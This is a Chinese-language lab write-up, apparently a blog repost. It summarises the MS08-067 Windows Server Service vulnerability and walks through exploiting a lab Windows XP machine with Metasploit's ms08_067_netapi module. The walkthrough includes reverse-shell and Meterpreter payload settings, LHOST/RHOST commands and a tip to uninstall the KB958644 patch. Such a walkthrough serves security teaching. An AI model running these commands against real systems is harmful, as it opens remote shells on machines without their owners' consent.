zoukankan      html  css  js  c++  java
  • MS08-067

    简单介绍一下漏洞

        ms08-067 编辑 讨论 
    
    MS08-067漏洞将会影响除Windows Server 2008 Core以外的所有Windows系统,包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。
    
    中文名
        ms08-067 
    外文名
        ms08-067 
    
    发布日期:
        2008/10/22 
    下载大小:
        因操作系统而异 
    类    别
        漏洞 
    
    说明:微软安全公告KB958644
    漏洞影响:服务器服务中的漏洞可能允许远程执行代码
    发布日期:2008/10/22
    下载大小:因操作系统而异。
    受影响的操作系统: Windows 2000;XP;Server 2003;Vista;Server 2008;7 Beta
    摘要
    此安全更新解决了服务器服务中一个秘密报告的漏洞。 如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码。 此漏洞可能用于进行蠕虫攻击。 防火墙最佳做法和标准的默认防火墙配置有助于保护网络资源免受从企业外部发起的攻击。可以通过安装本 Microsoft 更新程序来保护计算机不受侵害。安装后,可能必须重新启动计算机。
    严重等级:Windows 2000;XP;Server 2003为严重,Windows Vista;Server 2008;7 Beta为重要。

    0X02实战

    靶机ip 192.168.1.134   windows

    攻击机  192.168.1.137  kali

    先尝试一下能不能ping通

    能ping通 

    MS08_067远程漏洞攻击实践:Shell

    1、在kali终端中开启msfconsole。

    2然后找这个漏洞的利用方法

    msf5 > search ms08_067
    
    Matching Modules
    ================
    
       #  Name                                 Disclosure Date  Rank   Check  Description
       -  ----                                 ---------------  ----   -----  -----------
       0  exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption

    3、输入命令use exploit/windows/smb/ms08_067_netapi,进入该漏洞模块的使用。

    4、输入命令show payload会显示出有效的攻击载荷,如下图所示,我们找到一个shell_reverse_tcp。

    5、命令show targets会显示出可以被攻击的靶机的操作系统型号,如下图所示:

    6、使用命令set payload generic/shell_reverse_tcp设置攻击有效载荷。

    7、输入命令show options显示我们需要在攻击前需要设置的数据,如下图红框圈住的部分。

    8、输入命令

    msf5 exploit(windows/smb/ms08_067_netapi) > set LHOST 192.168.1.137
    LHOST => 192.168.1.137
    msf5 exploit(windows/smb/ms08_067_netapi) > set RHOST  192.168.1.134
    RHOST => 192.168.134

    然后9、输入命令exploit开始攻击,如下图所示是正常攻击成功结果。

    返回seesion就可以拿到shell

    Seeion –L

    就你可以看见这个shell

    Seeions –I 1

    进入shell

     下面是转的别人的

    MS08_067远程漏洞攻击实践:meterpreter

    1、前面依然使用命令use exploit/windows/smb/ms08_067_netapi,进入ms08_067漏洞模块。

    2、设置payload:set payload windows/meterpreter/reverse_tcp

    3、show options,查看需要设置的ip地址,如下图所示,是已经设置好的

    4、成功攻击结果:

    5、执行ifconfig,查看靶机地址:

    6、ps查看进程:

    7、meterpreter转shell:

    实验中遇到的问题

    1、在做实验的时候用老师的xp系统作为靶机,但是在exploit的时候显示如下:no session was created。

    2、手动设置一个set session 1,结果还是不成功。

    3、在exploit前,使用check查看靶机状态,返回以下信息,表明目标主机是安全的,不能被攻击。

    4、网上查到可以卸载ms08_067的补丁,即卸载KB958644,文件路径:c:/windows找到KB958644(这是个隐藏文件),打开卸载exe程序,如下:

    5、重启后,还是不能成功,最后找了一个英文版的win xp sp 3 ,才成功完成。

  • 相关阅读:
    python excel 像 Excel 一样使用 python 进行数据分析
    ubuntu 系统分区
    ubuntu 配置和修改ip地址
    yum centos 修改镜像源
    centos6 安装 docker 问题
    Feign 的简单使用(2)
    feign client 的简单使用(1)
    xsync
    canal 配置
    javascript之DOM编程正则表达式引入
  • 原文地址:https://www.cnblogs.com/-zhong/p/11058602.html
Copyright © 2011-2022 走看看